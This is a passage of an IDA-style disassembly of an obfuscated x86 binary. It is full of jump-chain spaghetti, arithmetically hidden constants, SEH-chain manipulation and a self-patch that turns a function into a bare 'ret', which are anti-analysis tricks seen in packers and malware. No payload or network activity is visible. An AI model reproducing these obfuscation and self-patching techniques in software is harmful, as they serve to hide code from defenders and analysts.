; START OF FUNCTION CHUNK FOR sub_442B3B
loc_456BF4: ; CODE XREF: sub_442B3B-6A34j
sub eax, 3DB82EFAh
test eax, 1000h
jmp loc_458162
; END OF FUNCTION CHUNK FOR sub_442B3B
; ---------------------------------------------------------------------------
loc_456C05: ; CODE XREF: ut7h7i2x:00443850j
; ut7h7i2x:loc_45317Dj
cmp dword ptr [ebp-10h], 0
setnz byte ptr [ebp-5]
; START OF FUNCTION CHUNK FOR sub_44F43B
loc_456C0D: ; CODE XREF: sub_44F43B-115A6j
; ut7h7i2x:00440107j ...
mov al, [ebp-5]
mov esp, ebp
jmp loc_452373
; END OF FUNCTION CHUNK FOR sub_44F43B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4442CC
loc_456C17: ; CODE XREF: sub_4442CC+42F3j
pushf
push 1C5C8A03h
pop ebx
xor ebx, 45B58A17h
jmp loc_44299F
; END OF FUNCTION CHUNK FOR sub_4442CC
; ---------------------------------------------------------------------------
mov ebx, esi
jmp sub_451980
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44865D
loc_456C31: ; CODE XREF: sub_44865D-783Cj
; sub_44865D+Bj
jns loc_44D63C
lea eax, [ebp-24h]
push offset loc_45A388
jmp nullsub_270
; END OF FUNCTION CHUNK FOR sub_44865D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_439BF8
loc_456C44: ; CODE XREF: sub_439BF8:loc_459F14j
jnz loc_44651E
loc_456C4A: ; CODE XREF: ut7h7i2x:00455B39j
jmp loc_43A829
; END OF FUNCTION CHUNK FOR sub_439BF8
; ---------------------------------------------------------------------------
xor ecx, 0BFF4356Eh
jmp loc_446519
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_440944
loc_456C5A: ; CODE XREF: sub_440944+1C57j
ror eax, 13h
sub eax, 55391748h
ror eax, 1Dh
call sub_440783
loc_456C6B: ; CODE XREF: sub_440B68+19FDBj
jmp loc_44AE05
; END OF FUNCTION CHUNK FOR sub_440944
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43ADDB
loc_456C70: ; CODE XREF: sub_43ADDB+1F54Dj
jmp loc_44D6F2
; END OF FUNCTION CHUNK FOR sub_43ADDB
; ---------------------------------------------------------------------------
loc_456C75: ; CODE XREF: ut7h7i2x:004592C1j
jmp loc_450485
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4406F1
loc_456C7A: ; CODE XREF: sub_4406F1:loc_447993j
jge loc_442021
js loc_440149
loc_456C86: ; CODE XREF: ut7h7i2x:loc_43FCE8j
xor esi, 17AAB5F3h
jmp loc_4510A5
; END OF FUNCTION CHUNK FOR sub_4406F1
; ---------------------------------------------------------------------------
loc_456C91: ; CODE XREF: ut7h7i2x:00451E0Dj
mov [edi], eax
; =============== S U B R O U T I N E =======================================
sub_456C93 proc near ; CODE XREF: sub_43BDF6+1p
; FUNCTION CHUNK AT 0044CE9A SIZE 00000009 BYTES
xchg eax, [esp+0]
pop eax
mov eax, [ebp-20h]
call sub_455E89
jmp loc_44CE9A
sub_456C93 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44CAB9
loc_456CA4: ; CODE XREF: sub_44CAB9+789j
jbe loc_45ADB8
ja loc_43DEB9
and ebx, 7197218Dh
cmp esi, edi
jmp loc_45A0BF
; END OF FUNCTION CHUNK FOR sub_44CAB9
; =============== S U B R O U T I N E =======================================
sub_456CBD proc near ; CODE XREF: sub_43F82A+Ap
; ut7h7i2x:00443164j
; FUNCTION CHUNK AT 0043D74D SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004419AB SIZE 00000009 BYTES
; FUNCTION CHUNK AT 004464CA SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00450047 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 004561DA SIZE 0000000F BYTES
; FUNCTION CHUNK AT 00458109 SIZE 00000007 BYTES
xchg edi, [esp+0]
pop edi
mov edx, [ebp-8]
mov eax, [ebp-4]
call sub_4502F0
loc_456CCC: ; CODE XREF: sub_456D7C+Ej
jmp loc_4561DA
sub_456CBD endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_456CD1: ; CODE XREF: ut7h7i2x:loc_456328j
xchg ebp, [esp]
ror eax, 4
mov ds:dword_448200, eax
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44EB88
loc_456CDE: ; CODE XREF: sub_44EB88-3099j
jmp loc_4509DE
; END OF FUNCTION CHUNK FOR sub_44EB88
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_449B8E
loc_456CE3: ; CODE XREF: sub_449B8E+Ej
rol eax, 4
push offset loc_44D987
jmp loc_441F24
; END OF FUNCTION CHUNK FOR sub_449B8E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43A556
loc_456CF0: ; CODE XREF: sub_43A556+10223j
jnz loc_443134
loc_456CF6: ; CODE XREF: sub_443F66+15j
jmp sub_44D8E8
; END OF FUNCTION CHUNK FOR sub_43A556
; ---------------------------------------------------------------------------
xchg ebx, [esi]
mov edx, 3B063C64h
xor ecx, eax
jmp loc_443134
; ---------------------------------------------------------------------------
loc_456D09: ; CODE XREF: ut7h7i2x:loc_446A87j
mov [ebp-8], eax
cmp dword ptr [ebp-8], 0
jz loc_449C1D
; START OF FUNCTION CHUNK FOR sub_4524FE
loc_456D16: ; CODE XREF: sub_4524FE-88E7j
; sub_44D255:loc_44C80Dj
jo loc_446F1C
cmp dword ptr [ebp-1Ch], 0Fh
jnz loc_43A51A
jmp loc_43FB7B
; END OF FUNCTION CHUNK FOR sub_4524FE
; ---------------------------------------------------------------------------
loc_456D2B: ; CODE XREF: ut7h7i2x:0045412Fj
xchg eax, [ecx]
; START OF FUNCTION CHUNK FOR sub_447CBE
loc_456D2D: ; CODE XREF: sub_447CBE:loc_45411Cj
add ebx, 2559D166h
xchg ebx, [esp+0]
jmp sub_45601B
; END OF FUNCTION CHUNK FOR sub_447CBE
; ---------------------------------------------------------------------------
mov [eax], edx
sbb ebx, 38E3086Fh
jmp sub_452C5A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_453E14
loc_456D48: ; CODE XREF: sub_453E14-15318j
adc esi, edi
loc_456D4A: ; CODE XREF: sub_453E14:loc_43BC0Ej
movzx eax, word ptr [ebp-6]
mov edx, [ebp-18h]
cmp eax, [edx+18h]
jnb loc_43FBA5
jmp loc_458F4B
; END OF FUNCTION CHUNK FOR sub_453E14
; =============== S U B R O U T I N E =======================================
sub_456D5F proc near ; DATA XREF: ut7h7i2x:004483B7o
; FUNCTION CHUNK AT 00457689 SIZE 00000005 BYTES
pop esi
jmp loc_457689
sub_456D5F endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44F57E
loc_456D65: ; CODE XREF: sub_44F57E+830Ej
shl ebx, 5
sbb ecx, 9EEEE00Dh
adc ecx, eax
add edx, 90A59B4Bh
pop edx
jmp loc_453A02
; END OF FUNCTION CHUNK FOR sub_44F57E
; =============== S U B R O U T I N E =======================================
sub_456D7C proc near ; DATA XREF: sub_447E29+120Bo
add eax, 3B359223h
mov eax, [eax]
push eax
call sub_442872
jmp loc_456CCC
sub_456D7C endp
; ---------------------------------------------------------------------------
xor eax, 0B9154B32h
rol eax, 1Dh
xor eax, 182B2A54h
rol eax, 8
push ebx
push 18317557h
pop ebx
and ebx, 0B404ED75h
jmp loc_43B960
; =============== S U B R O U T I N E =======================================
sub_456DB3 proc near ; CODE XREF: sub_455D84j
; DATA XREF: sub_44F495:loc_455D7Ao
; FUNCTION CHUNK AT 00441B36 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 004422C0 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00447338 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0044F163 SIZE 0000001B BYTES
; FUNCTION CHUNK AT 0044FEA0 SIZE 0000000D BYTES
push 0F90D7179h
pop edi
sub edi, 95AB6215h
test edi, 800h
jmp loc_4422C0
sub_456DB3 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_456DCA: ; CODE XREF: ut7h7i2x:0045979Bj
mov [ebx], esi
xor ebp, ecx
jmp loc_43B829
; ---------------------------------------------------------------------------
loc_456DD3: ; DATA XREF: ut7h7i2x:00439822o
test al, al
jz locret_44E2C3
jmp loc_4427D9
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44C8F3
loc_456DE0: ; CODE XREF: sub_44C8F3+3D0Ej
sub edi, 0FB951179h
sub edx, edi
sbb ebx, edx
loc_456DEA: ; CODE XREF: sub_44C8F3:loc_44B6A0j
lea eax, [ebp-14h]
jmp loc_44E60B
; END OF FUNCTION CHUNK FOR sub_44C8F3
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_452D3D
loc_456DF2: ; CODE XREF: sub_452D3D-54ADj
push 9BCCF45Eh
pop edx
rol edx, 4
test edx, 1000h
jmp loc_44769B
; END OF FUNCTION CHUNK FOR sub_452D3D
; ---------------------------------------------------------------------------
loc_456E06: ; DATA XREF: sub_43AA94:loc_43BD59o
xchg eax, [esp]
mov ebx, eax
xchg ebx, [esp]
lea eax, loc_458540
push eax
push ebx
mov ebx, eax
xchg ebx, [esp]
jmp loc_45218A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44917B
loc_456E20: ; CODE XREF: sub_44917B-AC90j
jge nullsub_236
sub ebp, edx
jmp loc_446A47
; END OF FUNCTION CHUNK FOR sub_44917B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_455807
loc_456E2D: ; CODE XREF: sub_455807:loc_444F9Bj
xor ebx, 0EA2B7D35h
sub ebx, 775E92B5h
xor ebx, 0C1E0F53h
and ebx, 90D77AFBh
jmp loc_43E539
; END OF FUNCTION CHUNK FOR sub_455807
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4424E8
loc_456E4A: ; CODE XREF: sub_4424E8+6j
jl loc_45418A
push offset loc_442CD1
jmp nullsub_275
; END OF FUNCTION CHUNK FOR sub_4424E8
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43EF73
loc_456E5A: ; CODE XREF: sub_43EF73+1881Dj
sbb ebp, esi
loc_456E5C: ; CODE XREF: sub_43EF73:loc_441C4Ej
pop large dword ptr fs:0
add esp, 4
push 41702FD7h
pop eax
rol eax, 2
add eax, 911530A3h
rol eax, 19h
jmp loc_453F40
; END OF FUNCTION CHUNK FOR sub_43EF73
; =============== S U B R O U T I N E =======================================
sub_456E7D proc near ; CODE XREF: ut7h7i2x:00449395j
; sub_440F8E:loc_44C26Ep
var_8 = dword ptr -8
var_4 = dword ptr -4
; FUNCTION CHUNK AT 00439F70 SIZE 00000022 BYTES
; FUNCTION CHUNK AT 0043A3E3 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043F7EB SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00441AA7 SIZE 0000001C BYTES
; FUNCTION CHUNK AT 00449C88 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044C68D SIZE 0000001D BYTES
; FUNCTION CHUNK AT 00450151 SIZE 00000017 BYTES
xchg ebx, [esp+8+var_8]
pop ebx
call sub_4587DD
push 0E3FB00BBh
pop edx
or edx, 0E66E63BAh
jmp loc_449C88
sub_456E7D endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4393B6
loc_456E97: ; CODE XREF: sub_4393B6:loc_442746j
push eax
mov edx, 0FFFFFFFFh
push edx
push eax
call sub_43D989
push ebx
jmp loc_44A019
; END OF FUNCTION CHUNK FOR sub_4393B6
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_444851
loc_456EAA: ; CODE XREF: sub_444851-2A40j
js loc_444F04
cdq
; END OF FUNCTION CHUNK FOR sub_444851
; START OF FUNCTION CHUNK FOR sub_43A556
loc_456EB1: ; CODE XREF: sub_44081E-2354j
; sub_43A556+94A5j ...
push offset sub_44928D
jmp loc_44B716
; END OF FUNCTION CHUNK FOR sub_43A556
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_45A20D
loc_456EBB: ; CODE XREF: sub_45A20D+Dj
pop edi
xor edi, 1DB33549h
add edi, 395B4C69h
xchg edi, [esp+0]
jmp loc_444BCA
; END OF FUNCTION CHUNK FOR sub_45A20D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4551C1
loc_456ED0: ; CODE XREF: sub_4551C1+5j
jmp ds:off_41D08C
; END OF FUNCTION CHUNK FOR sub_4551C1
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44D082
loc_456ED6: ; CODE XREF: sub_44D082+A2F1j
jmp loc_44826B
; END OF FUNCTION CHUNK FOR sub_44D082
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44EC6F
loc_456EDB: ; CODE XREF: sub_44EC6F-2A67j
jmp loc_449BE8
; END OF FUNCTION CHUNK FOR sub_44EC6F
; =============== S U B R O U T I N E =======================================
sub_456EE0 proc near ; CODE XREF: ut7h7i2x:00442C08j
; sub_4551C1p ...
; FUNCTION CHUNK AT 00442C0D SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00454122 SIZE 00000005 BYTES
pop edx
jo loc_442C0D
push offset sub_453936
jmp nullsub_280
sub_456EE0 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
test esi, edx
jmp loc_45065C
; ---------------------------------------------------------------------------
loc_456EF8: ; CODE XREF: ut7h7i2x:00455B9Dj
call sub_453476
loc_456EFD: ; CODE XREF: ut7h7i2x:0043B34Aj
jmp loc_43EB9E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43F19A
loc_456F02: ; CODE XREF: sub_43F19A-44C7j
push 7E248236h
xchg edx, [esp+4+var_4]
mov edi, edx
pop edx
jmp loc_45A770
; END OF FUNCTION CHUNK FOR sub_43F19A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_452B14
loc_456F12: ; CODE XREF: sub_452B14:loc_450F91j
jnz loc_43BB5B
jmp loc_448CC4
; END OF FUNCTION CHUNK FOR sub_452B14
; =============== S U B R O U T I N E =======================================
sub_456F1D proc near ; DATA XREF: sub_459485:loc_446359o
; FUNCTION CHUNK AT 0043AEB9 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00443F55 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044A50C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044B1BA SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044BBC1 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0044F3D9 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 00452AFD SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0045A296 SIZE 00000005 BYTES
pop ebx
mov [ebp-6], dx
mov [ebp-4], eax
xor eax, eax
mov [ebp-10h], eax
cmp dword ptr [ebp-4], 0
jmp loc_44A50C
sub_456F1D endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_449FB0
loc_456F33: ; CODE XREF: sub_449FB0:loc_4536CFj
jz loc_43C0F3
jmp loc_43B2A4
; END OF FUNCTION CHUNK FOR sub_449FB0
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_383. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_456F3F: ; CODE XREF: ut7h7i2x:00457293j
jmp loc_4444CB
; ---------------------------------------------------------------------------
loc_456F44: ; DATA XREF: sub_45612F-EC13o
xor ecx, 4F9BAE86h
xor edx, edx
div ecx
push ebx
push 0A92D8A1Ah
pop ebx
jmp loc_4504C2
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43A556
loc_456F5A: ; CODE XREF: sub_43A556:loc_44BBC9j
jz loc_44DA04
jmp loc_44A437
; END OF FUNCTION CHUNK FOR sub_43A556
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_440B68
loc_456F65: ; CODE XREF: sub_440B68:loc_43E370j
jnz loc_43B053
loc_456F6B: ; CODE XREF: ut7h7i2x:004517C9j
jmp loc_45AB3B
; END OF FUNCTION CHUNK FOR sub_440B68
; ---------------------------------------------------------------------------
and eax, ebx
cdq
jmp loc_453982
; ---------------------------------------------------------------------------
loc_456F78: ; CODE XREF: ut7h7i2x:0043EAEFj
mov ds:dword_43A7C0, eax
; START OF FUNCTION CHUNK FOR sub_44EC28
loc_456F7D: ; CODE XREF: ut7h7i2x:0043EAD5j
; sub_44EC28:loc_44EC2Fj ...
mov eax, ds:dword_43A7C0
call sub_4478ED
loc_456F87: ; CODE XREF: ut7h7i2x:0045785Cj
jmp loc_44C9D3
; END OF FUNCTION CHUNK FOR sub_44EC28
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4431FF
loc_456F8C: ; CODE XREF: sub_4431FF-4DA4j
jmp loc_44DAF0
; END OF FUNCTION CHUNK FOR sub_4431FF
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_448CBC
loc_456F91: ; CODE XREF: sub_448CBC+3j
push ecx
mov esp, ebp
xchg edi, [esp+0]
mov ebp, edi
jmp loc_43B630
; END OF FUNCTION CHUNK FOR sub_448CBC
; ---------------------------------------------------------------------------
loc_456F9E: ; CODE XREF: ut7h7i2x:00443982j
xchg edx, [esi]
sbb ecx, edx
mov ecx, [ebp+0]
; START OF FUNCTION CHUNK FOR sub_43FF65
loc_456FA5: ; CODE XREF: sub_43FF65+3A11j
add ebx, 0B69DA49Bh
xchg ebx, [esp+0]
jmp sub_4582C8
; END OF FUNCTION CHUNK FOR sub_43FF65
; =============== S U B R O U T I N E =======================================
sub_456FB3 proc near ; CODE XREF: sub_4396F5:loc_43D1DCp
; ut7h7i2x:00440063j
xchg esi, [esp+0]
pop esi
push 953D5730h
pop ecx
jmp loc_44BA5A
sub_456FB3 endp ; sp-analysis failed
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_58. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44124A
loc_456FC3: ; CODE XREF: sub_44124A+124CAj
jmp loc_444A73
; END OF FUNCTION CHUNK FOR sub_44124A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4462B0
loc_456FC8: ; CODE XREF: sub_4462B0+181Bj
jmp loc_451116
; END OF FUNCTION CHUNK FOR sub_4462B0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_445FEA
loc_456FCD: ; CODE XREF: sub_445FEA+10j
jmp loc_449F22
; END OF FUNCTION CHUNK FOR sub_445FEA
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43CD4E
loc_456FD2: ; CODE XREF: sub_43CD4E+Cj
jmp nullsub_564
; END OF FUNCTION CHUNK FOR sub_43CD4E
; ---------------------------------------------------------------------------
or ebx, 2E39641Bh
add edx, 24AD4487h
jmp sub_43AE31
; ---------------------------------------------------------------------------
loc_456FE8: ; CODE XREF: ut7h7i2x:004495F7j
jns loc_45986C
loc_456FEE: ; CODE XREF: ut7h7i2x:loc_450168j
push 7D3B8814h
pop edx
xor edx, 93A9071Fh
and edx, 9F785DA6h
xor edx, 0C11DF8C3h
add edx, ebp
jmp loc_439044
; ---------------------------------------------------------------------------
locret_45700D: ; CODE XREF: ut7h7i2x:loc_43AC08j
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_449DC4
loc_45700E: ; CODE XREF: sub_449DC4+ECFCj
jz loc_43EBFE
jmp loc_448253
; END OF FUNCTION CHUNK FOR sub_449DC4
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43B7F7
loc_457019: ; CODE XREF: sub_43B7F7+DABDj
jnz loc_452739
jmp loc_44936D
; END OF FUNCTION CHUNK FOR sub_43B7F7
; ---------------------------------------------------------------------------
locret_457024: ; CODE XREF: ut7h7i2x:loc_44DBD6j
retn
; ---------------------------------------------------------------------------
loc_457025: ; CODE XREF: ut7h7i2x:004464E3j
jo loc_44A8E4
popf
; START OF FUNCTION CHUNK FOR sub_449AD9
loc_45702C: ; CODE XREF: sub_449AD9:loc_4464C4j
sub edi, 0E40E217Eh
rol edi, 1Bh
add edi, 0B140CB5Ch
add eax, edi
pop edi
mov eax, [eax]
jmp loc_4401FF
; END OF FUNCTION CHUNK FOR sub_449AD9
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_408. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_446F9A
loc_457046: ; CODE XREF: sub_446F9A+1373Cj
jmp loc_44B8D7
; END OF FUNCTION CHUNK FOR sub_446F9A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_444273
loc_45704B: ; CODE XREF: sub_444273+11DEDj
jmp loc_4409E5
; END OF FUNCTION CHUNK FOR sub_444273
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44101A
loc_457050: ; CODE XREF: sub_44101A:loc_44012Bj
mov ecx, [ecx]
or [ecx+edx], al
mov ecx, [ebp-18h]
push edx
push 0D39EB2C2h
pop edx
jmp loc_44C074
; END OF FUNCTION CHUNK FOR sub_44101A
; ---------------------------------------------------------------------------
sub esi, 262AADF3h
jmp sub_4551D3
; ---------------------------------------------------------------------------
loc_45706F: ; CODE XREF: ut7h7i2x:loc_43D7A1j
jnz loc_44ED2B
jmp loc_4504BD
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_439BD1
loc_45707A: ; CODE XREF: sub_439BD1+1CAC5j
jo loc_43BACE
jnb loc_441654
jmp loc_452A7A
; END OF FUNCTION CHUNK FOR sub_439BD1
; ---------------------------------------------------------------------------
loc_45708B: ; CODE XREF: ut7h7i2x:00446F95j
ror eax, 11h
mov ds:dword_44A86C, eax
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4503C3
loc_457095: ; CODE XREF: sub_4503C3:loc_453F50j
jmp loc_449516
; END OF FUNCTION CHUNK FOR sub_4503C3
; ---------------------------------------------------------------------------
loc_45709A: ; CODE XREF: ut7h7i2x:loc_457E04j
push ebp
mov ebp, esp
push ecx
mov esp, ebp
jmp loc_454907
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43D021
loc_4570A5: ; CODE XREF: sub_43D021:loc_4402F6j
jnz loc_455719
jmp loc_449CF4
; END OF FUNCTION CHUNK FOR sub_43D021
; ---------------------------------------------------------------------------
cmp edi, edx
jmp loc_451D07
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43C2F9
loc_4570B7: ; CODE XREF: sub_43C2F9:loc_44B0DFj
mov ebx, eax
xchg ebx, [esp+4+var_4]
mov edx, eax
loc_4570BE: ; CODE XREF: ut7h7i2x:0045A2D3j
push offset sub_44D0E5
jmp nullsub_285
; END OF FUNCTION CHUNK FOR sub_43C2F9
; ---------------------------------------------------------------------------
loc_4570C8: ; CODE XREF: ut7h7i2x:0043FF58j
xchg eax, [ebp+0]
ja loc_44AF68
ror ebp, 17h
; START OF FUNCTION CHUNK FOR sub_43BBF3
loc_4570D4: ; CODE XREF: sub_43BBF3:loc_43FF3Dj
add edx, 448C52FDh
xchg edx, [esp+4+var_4]
jmp loc_4559AE
; END OF FUNCTION CHUNK FOR sub_43BBF3
; ---------------------------------------------------------------------------
loc_4570E2: ; CODE XREF: ut7h7i2x:00456879j
jge loc_458191
cdq
jmp loc_44C8A1
; ---------------------------------------------------------------------------
mov edx, 19CFC62Bh
call sub_455CD8
; START OF FUNCTION CHUNK FOR sub_452B14
loc_4570F8: ; CODE XREF: sub_452B14+2705j
jmp loc_4437EA
; END OF FUNCTION CHUNK FOR sub_452B14
; =============== S U B R O U T I N E =======================================
sub_4570FD proc near ; CODE XREF: ut7h7i2x:0043DDBAj
; sub_443488+1p
arg_8 = dword ptr 0Ch
; FUNCTION CHUNK AT 0043AABA SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00441A9A SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00448CB2 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004492BA SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00454090 SIZE 0000000D BYTES
xchg edi, [esp-0Ch+arg_8]
pop edi
mov ebp, esp
add esp, 0FFFFFFF8h
call sub_452D56
test al, al
jz loc_454090
jmp loc_4492BA
sub_4570FD endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43EF73
loc_457118: ; CODE XREF: sub_43EF73+13j
and ebx, 94FDE3F3h
add ebx, 7FCB1F1Eh
add eax, ebx
pop ebx
jmp loc_452C2B
; END OF FUNCTION CHUNK FOR sub_43EF73
; ---------------------------------------------------------------------------
loc_45712C: ; CODE XREF: ut7h7i2x:loc_43CEF3j
push edi
mov edi, edx
xchg edi, [esp]
call sub_43DA21
mov eax, 4C5D3995h
call sub_43AA94
jmp loc_43E5B4
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43DD17
loc_457146: ; CODE XREF: sub_43DD17+2504j
jno loc_43B248
or edi, 9E958711h
loc_457152: ; CODE XREF: sub_43DD17:loc_440209j
add edx, 0A7B70CEEh
popf
jmp loc_454BA8
; END OF FUNCTION CHUNK FOR sub_43DD17
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_457A66
loc_45715E: ; CODE XREF: sub_457A66-16DB5j
; ut7h7i2x:00440CC3j
add edx, 0D605F888h
add edx, ebp
call sub_44271B
loc_45716B: ; CODE XREF: sub_43EDA4+1B626j
jmp loc_4426AC
; END OF FUNCTION CHUNK FOR sub_457A66
; ---------------------------------------------------------------------------
loc_457170: ; CODE XREF: ut7h7i2x:0044120Dj
jmp sub_444E04
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_144. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_457176: ; CODE XREF: ut7h7i2x:0044BB33j
jmp sub_43AA94
; ---------------------------------------------------------------------------
locret_45717B: ; CODE XREF: ut7h7i2x:loc_454A48j
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43FF65
loc_45717C: ; CODE XREF: sub_43FF65+13817j
cmp edx, esi
jmp loc_43DE13
; END OF FUNCTION CHUNK FOR sub_43FF65
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_446F62
loc_457183: ; CODE XREF: sub_446F62:loc_44BE69j
mov edx, eax
jmp loc_4572B3
; END OF FUNCTION CHUNK FOR sub_446F62
; ---------------------------------------------------------------------------
loc_45718A: ; CODE XREF: ut7h7i2x:00449C8Dj
push 8C1DE3E6h
pop edx
and edx, 4416D42Eh
add edx, 0FC2ED6B6h
jmp loc_4478C1
; ---------------------------------------------------------------------------
xor esi, eax
jmp loc_44407A
; ---------------------------------------------------------------------------
loc_4571A8: ; DATA XREF: sub_446320:loc_44C52Co
jnb loc_45AA91
push ebx
push 1DE1B4BCh
pop ebx
add ebx, 0DE5ED6B5h
or ebx, 4D292584h
add ebx, 257F2F5Bh
rol ebx, 9
jmp loc_43C919
; ---------------------------------------------------------------------------
mov eax, 0A7C2536Ch
push edi
push 13DB16BEh
pop edi
rol edi, 3
jmp loc_459967
; ---------------------------------------------------------------------------
loc_4571E3: ; CODE XREF: ut7h7i2x:0045164Ej
jnz loc_445F38
; START OF FUNCTION CHUNK FOR sub_4524FE
loc_4571E9: ; CODE XREF: sub_4524FE+9CFj
jmp loc_43EF4F
; END OF FUNCTION CHUNK FOR sub_4524FE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43CCC3
loc_4571EE: ; CODE XREF: sub_43CCC3:loc_44C767j
jmp loc_44848F
; END OF FUNCTION CHUNK FOR sub_43CCC3
; ---------------------------------------------------------------------------
push 0DAC57416h
jmp loc_445F35
; ---------------------------------------------------------------------------
mov eax, 462C961Fh
loc_457202: ; CODE XREF: ut7h7i2x:loc_45289Aj
push ebx
push 0F14F1225h
pop ebx
rol ebx, 0Ch
jmp loc_442F67
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_453D07
loc_457211: ; CODE XREF: sub_453D07:loc_43CAE5j
lea eax, [ebp-14h]
; END OF FUNCTION CHUNK FOR sub_453D07
; START OF FUNCTION CHUNK FOR sub_44CAA4
loc_457214: ; CODE XREF: sub_44CAA4-BD06j
push eax
call sub_43BA59
mov ds:dword_43E36C, eax
lea eax, [ebp-14h]
xor edx, edx
loc_457224: ; CODE XREF: sub_448CBC:loc_4518D0j
call sub_43F058
jmp loc_440EB1
; END OF FUNCTION CHUNK FOR sub_44CAA4
; ---------------------------------------------------------------------------
mov ds:off_41D140, eax
lea eax, sub_441DBB
mov byte ptr [eax], 0C3h
jmp loc_43BC7B
; ---------------------------------------------------------------------------
push ecx
push 1B7702D2h
pop ecx
loc_457249: ; CODE XREF: ut7h7i2x:00449B41j
xor ecx, 432EDA18h
jmp loc_441E42
; ---------------------------------------------------------------------------
mov eax, 0CCBC9452h
jns loc_4488C3
jmp sub_444C41
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_456B2D
loc_457264: ; CODE XREF: sub_456B2D:loc_4590C4j
add eax, 0A04223E1h
push offset sub_455C28
jmp loc_4449CB
; END OF FUNCTION CHUNK FOR sub_456B2D
